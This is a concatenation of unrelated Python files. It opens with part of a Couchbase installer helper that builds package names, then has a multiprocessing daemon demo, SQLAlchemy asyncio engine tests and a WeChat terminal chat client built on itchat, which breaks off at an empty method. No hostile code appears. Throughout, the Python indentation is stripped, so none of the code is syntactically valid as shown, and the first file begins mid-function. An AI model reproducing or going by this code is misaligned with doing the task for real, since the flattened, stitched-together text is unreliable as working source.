elif os in install_constants.WINDOWS_SERVER:
return install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"]
def __get_build_binary_name(node):
# couchbase-server-enterprise-6.5.0-4557-centos7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-suse15.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-rhel8.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-oel7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-amzn2.x86_64.rpm
if node.get_os() in install_constants.X86:
return "{0}-{1}-{2}.{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
node.info.architecture_type,
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-ubuntu16.04_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-debian8_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-windows_amd64.msi
elif node.get_os() in install_constants.AMD64:
if "windows" in node.get_os():
node.info.deliverable_type = "msi"
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
"amd64",
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-macos_x86_64.dmg
elif node.get_os() in install_constants.MACOS_VERSIONS:
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
"macos",
node.info.architecture_type,
node.info.deliverable_type)
|
2_daemon.py | from logging_utils import info, debug,PROCESS_FORMAT
import logging
import multiprocessing
from random import randint
from time import sleep
logging.basicConfig(level=logging.DEBUG, format=PROCESS_FORMAT)
def sai_hi(id) -> None:
iteration = 0
while True:
iteration += 1
info(f"Hi! I'm a new process with id = {id}")
sleep(2)
debug(f"End of iteration {iteration} in process {id}")
if __name__ == "__main__":
info("Hi, I'm main process")
for i in range(2):
process = multiprocessing.Process(target=sai_hi, kwargs={"id": i+1}, name=f"Process-SGG-{i+1}", daemon=True)
process.start()
sleep(60) |
test_engine_py3k.py | import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
from sqlalchemy import Table, Column, Integer, func, select
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = testing.engines.testing_engine(
asyncio=True, transfer_staticpool=True
)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
conn = await async_engine.connect()
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(conn.default_isolation_level, sync_conn.default_isolation_level)
@async_test
async def test_transaction_accessor(self, async_engine):
async with async_engine.connect() as conn:
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
@async_test
async def test_get_dbapi_connection_raise(self, async_engine):
conn = await async_engine.connect()
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
conn.connection
@async_test
async def test_get_raw_connection(self, async_engine):
conn = await async_engine.connect()
pooled = await conn.get_raw_connection()
is_(pooled, conn.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_engine):
conn = await async_engine.connect()
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
await conn.close()
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
c1 = async_engine.connect()
c2 = async_engine.connect()
await asyncio.wait([c1, c2])
@async_test
async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
await trans.rollback(),
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
conn = await async_engine.connect()
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
|
User.py | # Authro : ThreeDog
# Data : 2019-05-28
# Function : 将所有的用户、消息相关的操作封装在一个模块中。
# Remark : Users中有一个字典存放所有User,User中有一个队列(list)存放所有消息
import threading
import time
import itchat
from itchat.content import *
from MyCommand import Cmd
from Common import user_type_dict,type_dict,history,minput
from tdinput import register_func,CmdType,td_print,td_flush
from tdinput import set_msg , set_index , has_msg, td_input
from translator import tdtr
class Msg(object):
def __init__(self,msg,type):
'''
初始化消息内容,参数是从itchat接收到的msg内容。
'''
self.createTime = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(msg.CreateTime)) # 创建时间
self.text = msg.Text # 数据内容
self.remarkName = ''
if msg.Type in type_dict: # 根据数据类型做特殊处理
self.text = tdtr(type_dict[msg.Type])
self.text = self.text.replace("\n","\n\033[99999999999999999D") # 将换行替换掉,因为出现换行要重新定位光标到行首
# 根据不同类型做不同判断
if "u" == type:
if "NickName" not in msg.User:
self.nickName = msg.User.UserName
else :
self.nickName = msg.User.NickName # 消息发送者昵称
if "RemarkName" not in msg.User:
self.remarkName = msg.User.UserName
else :
self.remarkName = msg.User.RemarkName # 消息发送者备注
self.userName = msg.User.UserName # 用户名,是微信接口中的id,唯一。
elif "r" == type:
user = Users.instance().getUserByUserName(msg.ActualUserName)
if user is not None:
self.remarkName = user.remarkName # 消息发送者备注
self.nickName = msg.ActualNickName # 消息发送者昵称
self.userName = msg.ActualUserName # 用户名,是微信接口中的id,唯一。
else :
print(tdtr("消息类型参数错误,请重试"))
def getName(self):
if self.remarkName == '':
return self.nickName
return self.remarkName
class User(object):
'''
用户类,每个用户维护一个消息队列用于存储当前的未读消息。
'''
def __init__(self,*args):
self.id = args[0] # id
self.userName = args[1] # 微信指定的的唯一用户名
self.nickName = args[2] # 昵称
self.remarkName = args[3] # 备注
self.type = tdtr(user_type_dict[args[4]]) # 类型 f | r ---> 好友 | 群聊
self.msgs = []
def addMsg(self,msg):
self.msgs.insert(0,msg)
def takeMsg(self):
return self.msgs.pop()
def getName(self):
if self.remarkName == "":
return self.nickName
return self.remarkName
def hasNewMsg(self): # 判断是否有新消息
if len(self.msgs) == 0:
return False
else:
return True
def __contains__(self,e): # 重载 in / not in 运算符
if e in self.nickName or e in self.remarkName:
return True
return False
def __eq__(self,e): # 重载 == 运算符, 如果两者用户名相同就被认为是相同的用户
if e is None :
return False
return e.userName == self.userName
class Users(object):
'''
保存所有用户和群聊,并且提供所有的相关操作
'''
def __init__(self):
self.user_count = 0
self.selfUser = None
self.user_dict = {}
self.current_user = None # 当前正在聊天的用户
self.room_dept = -1 # 用于记录好友和群聊的分界点id
self.cmd = Cmd(self) # 初始化一个命令管理器, 此命令管理器管理所有的命令
itchat.auto_login(hotReload=True,enableCmdQR = 2,exitCallback=itchat.logout) #登录并记录登录状态
threading.Thread(target=itchat.run).start() # 线程启动run实现
self.loadUserList(itchat.get_friends(),'f') # 加载好友
self.loadUserList(itchat.get_chatrooms(),'r') # 加载群聊
@classmethod
def instance(cls,*args,**kwargs):
if not hasattr(Users, "_instance"):
Users._instance = Users(*args, **kwargs)
return Users._instance
def exec(self):
'''
用户模块的事件循环
'''
try:
while True:
print(">>> ",end = '')
cmd = minput().strip() # 获取字符去除前后空格
if cmd == '': # 输入无效内容,直接跳过
continue
if cmd == 'exit':
itchat.logout()
break
cmd = cmd.split(' ') # 命令去除前后空格后按空格分割
if cmd[0] not in dir(self.cmd):
print(tdtr("命令错误,请重试"))
continue
# 调用cmd所匹配的函数,通过反射的形式调用 即只要用户输入指令与函数名匹配即可调用。
getattr(self.cmd,cmd[0])(cmd[1:])
except Exception as e:
print(e)
itchat.logout()
def addUser(self,user,type):
'''
单独添加一个user
'''
new_user = User(self.user_count,user.UserName,user.NickName,user.RemarkName,type)
self.user_dict[self.user_count] = new_user # 键是ID,值是用户
self.user_count += 1
def reloadUserList(self):
'''
重载好友列表,如果程序运行期间添加了好友或群聊,通过此命令刷新
'''
self.selfUser = None
self.current_user = None
self.user_dict = {}
self.user_count = 0
self.loadUserList(itchat.get_friends(),'f') # 加载好友
self.loadUserList(itchat.get_chatrooms(),'r') # 加载群聊
def loadUserList(self,users,type='f'):
'''
加载好友列表,加好友传入u,加群聊传入r
'''
for user in users:
self.addUser(user,type)
self.selfUser = self.user_dict[0]
def hasNewMsg(self):
'''
判断是否有新消息,判断所有的消息列表是否为空
'''
for user in self.getUsers():
if user.hasNewMsg() : # 有新消息直接返回True
return True
# 均为空返回False
return False
def getUserByID(self,uid):
'''
通过ID获取用户
'''
if uid not in self.user_dict:
return None
return self.user_dict[uid]
def getUserByUserName(self,username):
'''
通过微信的id查找用户
'''
for user in self.getUsers():
if user.userName == username:
return user
return None
def getUsers(self):
'''
获取所有的用户
'''
return list(self.user_dict.values())
def handelMsg(self,msg,type):
'''
处理接收到的消息,或打印或存入消息队列
type : 好友信息是 f 群聊消息是 r
'''
user = self.getUserByUserName(msg.FromUserName)
if msg['ToUserName'] == 'filehelper': # 文件助手发送来的消息,做特殊处理
user = self.getUserByID(0)
elif msg['ToUserName'] != self.selfUser.userName: # 忽略掉发送目标不是自己的
return
elif msg['FromUserName'] == self.selfUser.userName: # 忽略掉自己发来的消息(否则发送给群聊的消息会被排入队列)
return
if msg['FromUserName'] == 'newsapp': # 忽略掉腾讯新闻消息
return
if msg['FromUserName'] == 'filehelper':
return
if user is not None:
m = Msg(msg,type)
if user == self.current_user: # 如果当时正在和这个人聊天
if not has_msg(): # 如果输入区为空的话,直接打印消息
td_print(("\n\033[99999999999999999D【{}】{} ===> :{}\n\033[99999999999999999D"+tdtr(" 与 {} 聊天中 >>> ")).format(m.createTime,m.getName(),m.text,self.current_user.getName()),end="")
td_print("\033[s",end="") # 保存光标位置
else :
user.addMsg(m)
else: # 如果不是的话,直接排入消息队列
user.addMsg(m)
def sendMsg(self,msg,username):
itchat.send(msg,toUserName=username)
def ignore(self,arg):
'''
忽略掉对应的内容
'''
